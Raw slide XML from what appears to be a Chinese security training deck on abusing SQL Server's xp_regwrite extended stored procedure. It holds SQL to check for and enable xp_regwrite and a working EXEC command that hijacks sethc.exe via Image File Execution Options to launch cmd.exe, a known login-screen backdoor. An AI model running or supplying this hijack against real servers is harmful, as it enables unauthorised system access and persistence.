                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>是否启用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regwrite' </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5382060-16B7-4184-B4A2-0E966452D6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="246286" cy="4718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50784" rIns="121920" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233878970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2"/>
            <a:ext cx="11035409" cy="48013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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xp_regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a: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xp_regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>存储过程对注册表进行修改，替换成任意值，造成镜像劫持。</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lvl="0" eaLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>前提条件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1.未禁止注册表编辑（即写入功能）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2.xp_regwrite启用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="20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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3751002" y="5017864"/>
            <a:ext cx="4689993" cy="1354211"/>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en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>开启</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0">
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>EXEC sp_configure 'show advanced options', 1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>RECONFIGURE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>EXEC sp_configure 'xp_regwrite',1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>RECONFIGURE </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5382060-16B7-4184-B4A2-0E966452D6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="246286" cy="4718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50784" rIns="121920" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084890CD-A1AF-43E6-9F1F-EE5526FFBC38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="246286" cy="4718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50784" rIns="121920" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48170559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2"/>
            <a:ext cx="11035409" cy="48013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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xp_regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a: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xp_regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>存储过程对注册表进行修改，替换成任意值，造成镜像劫持。</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lvl="0" eaLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>前提条件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1.未禁止注册表编辑（即写入功能）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2.xp_regwrite启用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="20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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1878644" y="5133177"/>
            <a:ext cx="8434709" cy="1600432"/>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hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数修改组注册表进行劫持</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:\windows\system32\cmd.exe' </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5382060-16B7-4184-B4A2-0E966452D6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="246286" cy="4718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50784" rIns="121920" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084890CD-A1AF-43E6-9F1F-EE5526FFBC38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="246286" cy="4718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50784" rIns="121920" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E220F8F-95FD-4E07-9D70-EBAFADC15A5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="68854"/>
            <a:ext cx="246286" cy="4718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50784" rIns="121920" bIns="50784" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39670975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2"/>
            <a:ext cx="11035409" cy="48013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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xp_regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a: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xp_regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>存储过程对注册表进行修改，替换成任意值，造成镜像劫持。</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lvl="0" eaLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>前提条件：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1.未禁止注册表编辑（即写入功能）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2.xp_regwrite启用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="20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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1050632" y="5139840"/>
            <a:ext cx="10563072" cy="1600432"/>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eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
